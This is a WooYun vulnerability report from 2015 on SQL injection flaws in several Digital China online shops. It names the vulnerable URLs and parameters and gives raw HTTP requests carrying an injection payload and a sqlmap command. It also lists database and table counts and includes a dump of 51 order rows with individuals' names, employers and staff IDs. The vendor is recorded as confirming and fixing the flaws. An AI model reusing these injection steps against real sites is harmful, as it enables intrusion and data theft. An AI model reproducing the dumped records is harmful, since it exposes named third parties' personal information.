当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140585

漏洞标题:神州数码某网上商城SQL注入大礼包

相关厂商:digitalchina.com

漏洞作者: 深度安全实验室

提交时间:2015-09-13 10:42

修复时间:2015-10-19 17:06

公开时间:2015-10-19 17:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-13: 细节已通知厂商并且等待厂商处理中
2015-09-14: 厂商已经确认,细节仅向厂商公开
2015-09-24: 细节向核心白帽子及相关领域专家公开
2015-10-04: 细节向普通白帽子公开
2015-10-14: 细节向实习白帽子公开
2015-10-19: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

rt

详细说明:

神州数码思科网络加油站 如下链接存在SQL注入,其中,gid参数有问题

http://www.ciscostation.com.cn/mall/mallhddise.jsp?gid=411

7.png


6个库

3.png


0x02
如下链接存在SQL注入漏洞,其中,cato参数有问题

POST /sp/showBrandDetail.do?brand=0&cato=03 and 1=1*&catt=0 HTTP/1.1
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.e-bridge.com.cn:80/
Cookie: JSESSIONID2=9fqOm-2v1GbV13mvBUEVx1fGbRkyEQK_xWsCu1B9A2mK13k1olS3!713506140!416110990; chgimg=1;
cookie_prod_id=000000000259032885
Host: www.e-bridge.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0
Safari/537.21
Accept: */*
pageSize=10

sz-1.jpg


泄露21个库

sz-2.jpg

以BITS库为例,泄露254个表

sz-3.jpg

表太多了,以SPM_BASEDEPART_PROCEDURE_TAB为例

sz-4.jpg

其它的表不继续了
0x03
http://servexpress.digitalchina.com/sms/reg/login.asp
该页面呢根据机器序列号查询存在注入,oracle报错
POST /sms/reg/a.asp?func_id=Find&model=XIBM008&sn=1233 HTTP/1.1
Host: servexpress.digitalchina.com
Proxy-Connection: keep-alive
Content-Length: 0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Origin: http://servexpress.digitalchina.com
Accept: */*
Referer: http://servexpress.digitalchina.com/sms/reg/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDCCTBCRTR=KHPFKMCBMICMIELAFDOODOIE; ASPSESSIONIDACQDDRTR=JPAAPCEBIBAKDEDOFLCINENM; ASPSESSIONIDCCSDCRSQ=OLKFKPPAOMPFHOAFJBLFPIKG
0x04
神州数码思科网络加油站 如下链接存在SQL注入,其中,gid参数有问题

http://www.ciscostation.com.cn/mall/jdmerchandise.jsp?gid=2

12.jpg


6个库

3.png


漏洞证明:

qlmap.py -r enen.txt --dbs

fast.png


Database: ERS
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| LOGIN_LIST | 4141728 |
| CUST | 2718576 |
| PERSON_INF | 2392669 |
| CCS_DELL_RESULT | 1154633 |
| MAIL | 1056855 |
| CCS_CASE | 854095 |
| ORGNIZATION_PROFILE | 316973 |
| CCS_AD_BILL | 260222 |
| CCS_AD_OPT_LOG | 116561 |
| DAY_LIST | 10000 |

修复方案:

以cisstation库、moneyjl表为例,发现大量订单信息

Database: cisstation
Table: moneyjl
[51 entries]
+----+---------------+-------+-----------------+---------------------------------+------------+----------+
| id | number | sqrxm | sqrgs | prize | stime | proposer |
+----+---------------+-------+-----------------+---------------------------------+------------+----------+
| 33 | 1210233764000 | 柳萌 | 神州数码(中国)有限公司 | Apple Phone(或同等价值礼品) | 2008-05-08 | SE6907 |
| 34 | 1212033986300 | 孔娜 | 北京安达信通系统集成有限公司 | 笔记本电脑(或同等价值礼品) | 2008-05-29 | SE4981 |
| 35 | 1212034028500 | 孔娜 | 北京安达信通系统集成有限公司 | Apple Phone(或同等价值礼品) | 2008-05-29 | SE4981 |
| 36 | 1212034054700 | 孔娜 | 北京安达信通系统集成有限公司 | Sony PSP(或同等价值礼品) | 2008-05-29 | SE4981 |
| 37 | 1212044933300 | 程娟 | 北京阳光世远科技发展有限公司 | 数码相机(或同等价值礼品) | 2008-05-29 | SE1229 |
| 38 | 1212045327000 | 杨征宇 | 深圳市新链路科技有限公司 | Apple Phone(或同等价值礼品) | 2008-05-29 | SE1404 |
| 39 | 1213603970400 | 赵平英 | 北京明道泰和信息技术有限公司 | 笔记本电脑(或同等价值礼品) | 2008-06-16 | SE4257 |
| 40 | 1213608749800 | 孔娜 | 北京安达信通系统集成有限公司 | 笔记本电脑(或同等价值礼品) | 2008-06-16 | SE4981 |
| 41 | 1213608761100 | 孔娜 | 北京安达信通系统集成有限公司 | 任天堂NDS游戏机(或同等价值礼品) | 2008-06-16 | SE4981 |
| 42 | 1213692506900 | 杨征宇 | 深圳市新链路科技有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-06-17 | SE1404 |
| 43 | 1213837620000 | 李静 | 陕西瑞金电子科技有限公司 | 笔记本电脑(或同等价值礼品) | 2008-06-19 | SE8414 |
| 44 | 1215540525400 | 王晨 | 上海蝶桥网络信息技术有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-07-09 | SE5104 |
| 45 | 1215540656800 | 王晨 | 上海蝶桥网络信息技术有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-07-09 | SE5104 |
| 46 | 1217819597400 | 赵平英 | 北京明道泰和信息技术有限公司 | 笔记本电脑(或同等价值礼品) | 2008-08-04 | SE4257 |
| 47 | 1220327281900 | 方庆美 | 北京惠友天利科技发展有限公司 | 笔记本电脑(或同等价值礼品) | 2008-09-02 | SE4653 |
| 48 | 1221715303100 | 陈霞 | 苏州南大苏富特科技有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-09-18 | SE1706 |
| 49 | 1222051736800 | 李静 | 陕西瑞金电子科技有限公司 | 笔记本电脑(或同等价值礼品) | 2008-09-22 | SE8414 |
| 50 | 1222225203600 | 周兆卿 | 北京通天至达科技发展有限公司 | 笔记本电脑(或同等价值礼品) | 2008-09-24 | WL1151 |
| 51 | 1222480500600 | 杨征宇 | 深圳市新链路科技有限公司 | 笔记本电脑(或同等价值礼品) | 2008-09-27 | SE1404 |
| 52 | 1223617186200 | 黄瑜 | 北京格林恒业科技有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-10-10 | SE1414 |
| 53 | 1223867038900 | 周兆卿 | 北京通天在线科贸有限公司 | 笔记本电脑(或同等价值礼品) | 2008-10-13 | SE7227 |
| 54 | 1223888182300 | 赵平英 | 北京明道泰和信息技术有限公司 | 笔记本电脑(或同等价值礼品) | 2008-10-13 | SE4257 |
| 55 | 1223964920700 | 周虹怡 | 上海国腾致瑞科技有限公司 | 笔记本电脑(或同等价值礼品) | 2008-10-14 | SE4223 |
| 56 | 1225079010900 | 吴娉 | 苏州工业园区纵横计算机有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-10-27 | SE8391 |
| 57 | 1225159736200 | 杨祝 | 安徽轻工国际贸易股份有限公司 | 任天堂NDS游戏机(或同等价值礼品) | 2008-10-28 | SE5382 |
| 58 | 1225778150200 | 钱维娜 | 上海有为信息技术有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-11-04 | WL6875 |
| 59 | 1225778906200 | 方庆美 | 北京惠友天利科技发展有限公司 | 数码相机(或同等价值礼品) | 2008-11-04 | SE4653 |
| 60 | 1226454812500 | 胡敏 | 重庆怡讯网络技术有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-11-12 | SE6403 |
| 61 | 1226643245400 | 胡正刚 | 北京天正楦科网络技术有限公司 | 笔记本电脑(或同等价值礼品) | 2008-11-14 | SE4390 |
| 62 | 1226643257000 | 胡正刚 | 北京天正楦科网络技术有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-11-14 | SE4390 |
| 63 | 1227060073600 | 杨征宇 | 深圳市信德远致科技有限公司 | 任天堂NDS游戏机(或同等价值礼品) | 2008-11-19 | SE7169 |
| 64 | 1227163068600 | 李静 | 陕西瑞金电子科技有限公司 | 笔记本电脑(或同等价值礼品) | 2008-11-20 | SE8414 |
| 65 | 1227520163600 | 于惊涛 | 上海三零卫士信息安全有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-11-24 | SE3436 |
| 66 | 1227576751900 | 金明乐 | 郑州创元计算机网络工程有限公司 | 数码相机(或同等价值礼品) | 2008-11-25 | SE1710 |
| 67 | 1227578325100 | 胡正刚 | 北京天正楦科网络技术有限公司 | 诺基亚 N95(或同等价值礼品) | 2008-11-25 | SE4390 |
| 68 | 1227602260600 | 赵平英 | 北京明道泰和信息技术有限公司 | 笔记本电脑(或同等价值礼品) | 2008-11-25 | SE4257 |
| 69 | 1227666858000 | 飞翔 | 北京里奥卢夫广告有限公司 | 专家级工程师调用(可提供网络架构及项目咨询、工程师培训等服务) | 2008-11-26 | SE8512 |
| 70 | 1227667829400 | 武朋霞 | 北京雨禾盛科技有限公司 | 笔记本电脑(或同等价值礼品) | 2008-11-26 | SE7233 |
| 71 | 1228267495400 | 刘强 | 成都赛恩计算机网络技术有限公司 | 吹风机 | 2008-12-03 | SE1462 |
| 72 | 1228267517500 | 刘强 | 成都赛恩计算机网络技术有限公司 | 超薄U盘 | 2008-12-03 | SE1462 |
| 73 | 1228267666100 | 刘强 | 成都赛恩计算机网络技术有限公司 | 家用字母电话机 | 2008-12-03 | SE1462 |
| 74 | 1228293385100 | 史伟鹏 | 北京鑫网杰通讯技术有限公司 | 床上四件套 | 2008-12-03 | SE4951 |
| 75 | 1228293402300 | 史伟鹏 | 北京鑫网杰通讯技术有限公司 | 车载小冰箱 | 2008-12-03 | SE4951 |
| 76 | 1228359392200 | 史伟鹏 | 北京鑫网杰通讯技术有限公司 | 卡西欧手表 | 2008-12-04 | SE4951 |
| 77 | 1228381532600 | 丁琼 | 武汉汇通时代信息技术有限公司 | 吹风机 | 2008-12-04 | SE4768 |
| 78 | 1228381565900 | 丁琼 | 武汉汇通时代信息技术有限公司 | 超薄U盘 | 2008-12-04 | SE4768 |
| 79 | 1228467361300 | 史伟鹏 | 北京鑫网杰通讯技术有限公司 | 车载小冰箱 | 2008-12-05 | SE4951 |
| 80 | 1228467405000 | 史伟鹏 | 北京鑫网杰通讯技术有限公司 | 床上四件套 | 2008-12-05 | SE4951 |
| 81 | 1228814864900 | 王英杰 | 北京世纪华风科技发展有限公司 | 熨斗 | 2008-12-09 | SE8376 |
| 82 | 1228815002600 | 王英杰 | 北京世纪华风科技发展有限公司 | 超薄U盘 | 2008-12-09 | SE8376 |
| 83 | 1228815052300 | 王英杰 | 北京世纪华风科技发展有限公司 | 多功能读卡器 | 2008-12-09 | SE8376 |
+----+---------------+-------+-----------------+---------------------------------+------------+----------+

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-14 09:24

厂商回复:

尽快处理!

最新状态:

2015-10-19:已修复